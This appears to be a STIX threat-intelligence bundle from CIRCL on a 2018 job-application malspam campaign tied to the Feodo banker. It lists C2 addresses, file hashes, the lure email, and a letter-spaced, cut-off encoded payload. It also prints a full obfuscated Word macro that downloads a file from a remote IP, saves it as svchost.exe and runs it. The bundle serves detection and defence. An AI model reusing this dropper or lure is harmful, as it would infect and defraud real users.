2023-04-21 14:44:17 +00:00
{
"type" : "bundle" ,
"id" : "bundle--5b07b46a-bc20-4e71-8a39-4aa0950d210f" ,
"objects" : [
{
"type" : "identity" ,
"spec_version" : "2.1" ,
"id" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T11:16:57.000Z" ,
"modified" : "2018-05-25T11:16:57.000Z" ,
"name" : "CIRCL" ,
"identity_class" : "organization"
} ,
{
"type" : "grouping" ,
"spec_version" : "2.1" ,
"id" : "grouping--5b07b46a-bc20-4e71-8a39-4aa0950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T11:16:57.000Z" ,
"modified" : "2018-05-25T11:16:57.000Z" ,
"name" : "Malspam 2018-05-25: \"Regarding a job.\"" ,
"context" : "suspicious-activity" ,
"object_refs" : [
"indicator--5b07b4ac-5770-47f1-a145-4cc1950d210f" ,
"indicator--5b07b4ac-e5d4-4d38-8c1d-4627950d210f" ,
"x-misp-attribute--5b07b594-659c-4b2d-8b54-46af950d210f" ,
"observed-data--5b07b5e7-eae8-4e92-a0dc-424d950d210f" ,
"email-message--5b07b5e7-eae8-4e92-a0dc-424d950d210f" ,
"indicator--5b07cffc-bb94-4618-863f-49f0950d210f" ,
"indicator--5b07cffc-ecc4-49ca-bfb9-4343950d210f" ,
"indicator--5b07cffd-ec38-4319-831f-4087950d210f" ,
"indicator--5b07cffd-c580-405e-ba42-42a5950d210f" ,
"indicator--5b07cffe-5ac8-4d6e-8b6f-421e950d210f" ,
"indicator--5b07cffe-7be4-4dee-a711-4a45950d210f" ,
"indicator--5b07cfff-7998-4bf2-b7a8-4b11950d210f" ,
"indicator--5b07d000-9bfc-4d22-9a8a-4b51950d210f" ,
"indicator--5b07d000-96b0-4aa4-bee5-4fd0950d210f" ,
"indicator--5b07d001-7d14-4fbf-a05e-4b65950d210f" ,
"indicator--5b07d001-c034-45d8-ac30-469c950d210f" ,
"indicator--5b07d0ac-6840-4589-9eb7-496b950d210f" ,
"indicator--5b07d0ad-2990-49ca-82b5-4121950d210f" ,
"indicator--5b07d0ae-ed48-4869-9cd6-4c35950d210f" ,
"indicator--5b07d0af-b274-422d-85a0-4bdf950d210f" ,
"indicator--5b07d0af-92cc-4848-815d-48ce950d210f" ,
"indicator--5b07d0b0-9434-4888-86fc-4fc9950d210f" ,
"indicator--5b07d0b1-c940-4641-b73f-4263950d210f" ,
"indicator--5b07d0b2-a290-4484-a7aa-4cb2950d210f" ,
"indicator--5b07d0b3-0f64-4988-967c-40b2950d210f" ,
"indicator--5b07d0b4-94bc-4902-b6bf-423e950d210f" ,
"indicator--5b07d0b5-b87c-4202-bd71-4e66950d210f" ,
"indicator--5b07b502-35d0-4490-8947-4da6950d210f" ,
"indicator--5b07b547-3fd4-451f-b654-4fec950d210f" ,
"x-misp-object--19b89da3-fd67-4435-8c0a-e43223f4a68c" ,
2024-08-07 08:13:15 +00:00
"relationship--4fbb71a5-2ba8-4049-988f-d6fdbdab8828"
2023-04-21 14:44:17 +00:00
] ,
"labels" : [
"Threat-Report" ,
"misp:tool=\"MISP-STIX-Converter\"" ,
"misp-galaxy:banker=\"Feodo\"" ,
"circl:incident-classification=\"malware\""
] ,
"object_marking_refs" : [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07b4ac-5770-47f1-a145-4cc1950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:58:10.000Z" ,
"modified" : "2018-05-25T08:58:10.000Z" ,
"description" : "2nd stage location" ,
"pattern" : "[url:value = 'http://185.189.58.180/~filehost/background.png']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:58:10Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07b4ac-e5d4-4d38-8c1d-4627950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:58:04.000Z" ,
"modified" : "2018-05-25T08:58:04.000Z" ,
"description" : "2nd stage location" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '185.189.58.180']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:58:04Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "x-misp-attribute" ,
"spec_version" : "2.1" ,
"id" : "x-misp-attribute--5b07b594-659c-4b2d-8b54-46af950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T07:04:52.000Z" ,
"modified" : "2018-05-25T07:04:52.000Z" ,
"labels" : [
"misp:type=\"text\"" ,
"misp:category=\"Artifacts dropped\""
] ,
"x_misp_category" : "Artifacts dropped" ,
"x_misp_comment" : "contained macro" ,
"x_misp_type" : "text" ,
"x_misp_value" : "Rem Attribute VBA_ModuleType=VBADocumentModule\r\nOption VBASupport 1\r\nPrivate Sub Document_Open()\r\n\r\nDim WinHttpReq As Object\r\nSet WinHttpReq = CreateObject(\"Microsoft.XMLHTTP\")\r\n \r\nWinHttpReq.Open \"GET\", \"http://185.189.58.180/~filehost/background.png\", False, \"username\", \"password\"\r\nWinHttpReq.send\r\n\r\nDim first5 As String\r\n Dim second5 As String\r\n Dim last5 As String\r\n first5 = ChrW(65) & ChrW(68) & ChrW(79) & ChrW(68) & ChrW(66) & ChrW(46) & ChrW(83) & ChrW(116) & ChrW(114) & ChrW(101)\r\n second5 = ChrW(97) & ChrW(109)\r\n last5 = first5 + second5\r\n\r\nxyuhjnx = WinHttpReq.responseBody\r\nIf WinHttpReq.Status = 200 Then\r\n Set oStream = CreateObject(last5)\r\n oStream.Open\r\n oStream.Type = Val(\"1FFF\")\r\n oStream.Write WinHttpReq.responseBody\r\n \r\n Dim first6 As String\r\n Dim last6 As String\r\n first6 = ChrW(92) & ChrW(99) & ChrW(104) & ChrW(101) & ChrW(99) & ChrW(107) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101)\r\n last6 = first6\r\n \r\n oStream.SaveToFile Environ(\"Temp\") + \"\\svchost.exe\", Val(\"2FFF\")\r\n oStream.Close\r\n \r\nEnd If\r\n \r\nCall Shell(Environ(\"Temp\") + \"\\svchost.exe\", 0)\r\n\r\nMsgBox \"The operating system you are using does not support secured documents. Please re-open the document on a different computer. The Microsoft Word will exit now.\"\r\n\r\nActiveDocument.Close\r\n\r\nEnd Sub"
} ,
{
"type" : "observed-data" ,
"spec_version" : "2.1" ,
"id" : "observed-data--5b07b5e7-eae8-4e92-a0dc-424d950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T07:06:15.000Z" ,
"modified" : "2018-05-25T07:06:15.000Z" ,
"first_observed" : "2018-05-25T07:06:15Z" ,
"last_observed" : "2018-05-25T07:06:15Z" ,
"number_observed" : 1 ,
"object_refs" : [
"email-message--5b07b5e7-eae8-4e92-a0dc-424d950d210f"
] ,
"labels" : [
"misp:type=\"email-body\"" ,
"misp:category=\"Payload delivery\""
]
} ,
{
"type" : "email-message" ,
"spec_version" : "2.1" ,
"id" : "email-message--5b07b5e7-eae8-4e92-a0dc-424d950d210f" ,
"is_multipart" : false ,
"body" : "Hello there! I hope you are well! \r\n\r\nI'm very interested in a opening.\r\nSee my attached CV and get back to me as soon as possible!\r\n\r\nThe file is password protected to protect against identity theft. The password is \"resume\" \r\nThank you! \r\n\r\nHerschel"
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07cffc-bb94-4618-863f-49f0950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:32.000Z" ,
"modified" : "2018-05-25T08:57:32.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://80.82.115.164:4143/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:32Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07cffc-ecc4-49ca-bfb9-4343950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:32.000Z" ,
"modified" : "2018-05-25T08:57:32.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://213.108.33.44/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:32Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07cffd-ec38-4319-831f-4087950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:33.000Z" ,
"modified" : "2018-05-25T08:57:33.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://27.254.150.53:4143/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:33Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07cffd-c580-405e-ba42-42a5950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:33.000Z" ,
"modified" : "2018-05-25T08:57:33.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://189.51.144.3/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:33Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07cffe-5ac8-4d6e-8b6f-421e950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:34.000Z" ,
"modified" : "2018-05-25T08:57:34.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://159.203.94.198:4143/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07cffe-7be4-4dee-a711-4a45950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:34.000Z" ,
"modified" : "2018-05-25T08:57:34.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://178.62.39.238:443/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07cfff-7998-4bf2-b7a8-4b11950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:35.000Z" ,
"modified" : "2018-05-25T08:57:35.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://178.62.253.139:4143/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:35Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d000-9bfc-4d22-9a8a-4b51950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:36.000Z" ,
"modified" : "2018-05-25T08:57:36.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://52.4.64.240:4143/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:36Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d000-96b0-4aa4-bee5-4fd0950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:36.000Z" ,
"modified" : "2018-05-25T08:57:36.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://186.103.199.252:4143/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:36Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d001-7d14-4fbf-a05e-4b65950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:37.000Z" ,
"modified" : "2018-05-25T08:57:37.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://71.244.60.231:4143/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:37Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d001-c034-45d8-ac30-469c950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T08:57:37.000Z" ,
"modified" : "2018-05-25T08:57:37.000Z" ,
"description" : "POST" ,
"pattern" : "[url:value = 'http://84.200.208.98/']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T08:57:37Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"url\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0ac-6840-4589-9eb7-496b950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:28.000Z" ,
"modified" : "2018-05-25T09:00:28.000Z" ,
"description" : "C2 On port 4143" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '80.82.115.164' AND network-traffic:dst_port = '4143']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:28Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0ad-2990-49ca-82b5-4121950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:29.000Z" ,
"modified" : "2018-05-25T09:00:29.000Z" ,
"description" : "C2" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '213.108.33.44']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:29Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0ae-ed48-4869-9cd6-4c35950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:30.000Z" ,
"modified" : "2018-05-25T09:00:30.000Z" ,
"description" : "C2 On port 4143" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '27.254.150.53' AND network-traffic:dst_port = '4143']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:30Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0af-b274-422d-85a0-4bdf950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:31.000Z" ,
"modified" : "2018-05-25T09:00:31.000Z" ,
"description" : "C2" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '189.51.144.3']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:31Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0af-92cc-4848-815d-48ce950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:31.000Z" ,
"modified" : "2018-05-25T09:00:31.000Z" ,
"description" : "C2 On port 4143" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '159.203.94.198' AND network-traffic:dst_port = '4143']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:31Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0b0-9434-4888-86fc-4fc9950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:32.000Z" ,
"modified" : "2018-05-25T09:00:32.000Z" ,
"description" : "C2 On port 443" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '178.62.39.238' AND network-traffic:dst_port = '443']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:32Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0b1-c940-4641-b73f-4263950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:33.000Z" ,
"modified" : "2018-05-25T09:00:33.000Z" ,
"description" : "C2 On port 4143" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '178.62.253.139' AND network-traffic:dst_port = '4143']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:33Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0b2-a290-4484-a7aa-4cb2950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:34.000Z" ,
"modified" : "2018-05-25T09:00:34.000Z" ,
"description" : "C2 On port 4143" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '52.4.64.240' AND network-traffic:dst_port = '4143']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:34Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0b3-0f64-4988-967c-40b2950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:35.000Z" ,
"modified" : "2018-05-25T09:00:35.000Z" ,
"description" : "C2 On port 4143" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '71.244.60.231' AND network-traffic:dst_port = '4143']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:35Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0b4-94bc-4902-b6bf-423e950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:36.000Z" ,
"modified" : "2018-05-25T09:00:36.000Z" ,
"description" : "C2 On port 4143" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '186.103.199.252' AND network-traffic:dst_port = '4143']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:36Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst|port\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07d0b5-b87c-4202-bd71-4e66950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T09:00:37.000Z" ,
"modified" : "2018-05-25T09:00:37.000Z" ,
"description" : "C2" ,
"pattern" : "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '84.200.208.98']" ,
"pattern_type" : "stix" ,
"pattern_version" : "2.1" ,
"valid_from" : "2018-05-25T09:00:37Z" ,
"kill_chain_phases" : [
{
"kill_chain_name" : "misp-category" ,
"phase_name" : "Network activity"
}
] ,
"labels" : [
"misp:type=\"ip-dst\"" ,
"misp:category=\"Network activity\"" ,
"misp:to_ids=\"True\""
]
} ,
{
"type" : "indicator" ,
"spec_version" : "2.1" ,
"id" : "indicator--5b07b502-35d0-4490-8947-4da6950d210f" ,
"created_by_ref" : "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f" ,
"created" : "2018-05-25T07:02:26.000Z" ,
"modified" : "2018-05-25T07:02:26.000Z" ,
"description" : "document password: resume (as specified in the initial mail)" ,
"pattern" : " [ f i l e : h a s h e s . M D 5 = ' f c 3 a 527586746 a 950 d 51e0041 f 0 9266 a ' A N D f i l e : h a s h e s . S H A 1 = ' f c 56 a 18310 b e 9 c 7312 d c e b 2084 d f 0 3 b 0 282 d 3 f 37 ' A N D f i l e : h a s h e s . S H A 256 = ' d 5 a 8138 d 22083159836485 f f 0 d 9 b e 918902 b 0 2 c b c 0 609 a 67 f 2 c 5 f f 0 f 2e7 c 4431 ' A N D f i l e : n a m e = ' s c a n _ 38917 . d o c ' A N D f i l e : s i z e = ' 37888 ' A N D ( f i l e : c o n t e n t _ r e f . p a y l o a d _ b i n = ' U E s D B B Q A C Q A I A E 0 4 u U x V B Z o p u G E A A A C U A A A g A B w A Z m M z Y T U y N z U 4 N j c 0 N m E 5 N T B k N T F l M D A 0 M W Y w O T I 2 N m F V V A k A A w K 1 B 1 s C t Q d b d X g L A A E E I Q A A A A Q h A A A A S I v j o j C v p s e C x 4 A O K e l k 6 l o L b e G g i K 0 a 0 m c V K V b U H F M b 2 I g G f V z L a e M i Z Y Z q l x s V U y 80 + U 2 D r I E n 766 N o 4 M 14 e V v o z 49 O o H R F S s 6 a f P 8 Q Q d H t a 2 r j C 77 i Y o B W 2 p 2 I g N c i K C U G D U r v / a H p b 67 Z E W 1 o M 788 a 2 i K u y Y 9 q A p S a J h p r j V 9 i h D A F D m e u H I M W O F j B 7 z 87 M K a 37 B 0 M C T p i y v + G E N u E / p U a u S 8 v T 2 H Z J 1 f z 5 q 3 L h D v 2 v E H S c w k Y a C n k H k P S y r Q s q 9 t + Q B 41 X O k e n C M B B p C j l A X P z F 5 h R Y 7 u T J a c 3 / V M 6 O y j T r e F N j r U N v u f k P 4 Q h y 4 t C u m K r 3 j 9 q 1 K 7 C x A n 0 O T u x o 83 D L U Z s N q D K s D S P E B D 7 f K L Z j 9 y 1 V u 3 p R p q y c H r + 73 T I 39 o + b s W y n 85 d s o 7 c 9 p e D L r p Z E U v A M Z t b N 5 H C I / 5 i a 7 e F t o 0 t 9 G N A N 5 + X 0 L 41 E k D 5 K y l c E M M L u C q c 4 s o 6 Y x d k 9 O a q m o / g e 8 Z J f E b k X 5 I q D u o I Z / L 5 C d n L 21 t K U + M D n n n N x q j Y V r J p s n p 8 u G 0 73 v r E N e n 2 R r Y 5 o w L C + 3 Z t 8 X g H I X 4 f g A t 5 u l 6 L o Z 271 o I u L H D S l f n v z 1 V 8 R d 6 b 5 E r H g / Q J m a c k C c P N t H F 4 G + K O F L D w f b D h u g S 2 H M t / 8 K V g C F O N q z O R T S 2 i Y x f Q z s v l 7 J j u M k p G 32 x C I x / z I 0 i A Q u q o J l u 1 g Q G 44 L T 2 C p I e O x B q C v D v g / Z K B n E T W 5 X m K n s G B o 20 d d 7 Q V k s x q j t / i w a K Q b U m i I W 97 c m 1 z D 9 p M Z r / Z B Z n 0 z Y d 3 q 0 4 Y m + h y N U H o X i L 9 c z W 9 d U g Y R Z Z V 2 / E y B t f N T c + i U 2 x M u c o 74 I p M 0 36 n + 6 l 0 X j I j P e C V m L f Q o z s c + B z 9 d 5 h W y 1 I / p C I V M o S p h Y I q z E o 7 Z A s / S L d q / H U d X c X 5 e f x f 37 s m F K w A f M J H I k p 2 u O T / l 3 c x w / t n v W E D P U k E T 0 l c T h Y z S V x P w N Y 0 K 6 c n 9 O 1 q q s i Q O h x d 8 f w T 7 E k F U w V p 2 e G 0 6 Y S u K 0 h l w X Q V T Q l X U H n 40 t G P E R S l S z B r W 6 P O c z n m U G l b F j R h X 3 R g l N + k 4 Z G 0 m f l d l B U H r Q G P q W y d 22 B n P k p I D 61 n Y J U w 19 g A 1 j F k b w T u 4 o m 